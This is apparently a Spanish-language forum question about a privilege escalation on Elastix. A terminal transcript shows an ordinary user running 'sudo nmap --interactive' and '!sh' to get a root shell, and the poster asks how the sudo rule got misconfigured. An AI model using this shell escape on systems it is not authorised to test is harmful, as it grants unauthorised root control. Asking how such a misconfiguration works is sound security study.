Aquí hay una vulnerabilidad de escalada de privilegios en Elastix:
# id
# uid=100(name) gid=101(name)
# sudo nmap --interactive
# Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
# Welcome to Interactive Mode -- press h <enter> for help
# nmap> !sh
# id
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
¿Cómo podría un usuario normal iniciar nmap con el privilegio sudo? ¿Qué es exactamente mal configurado aquí?
Fuente: enlace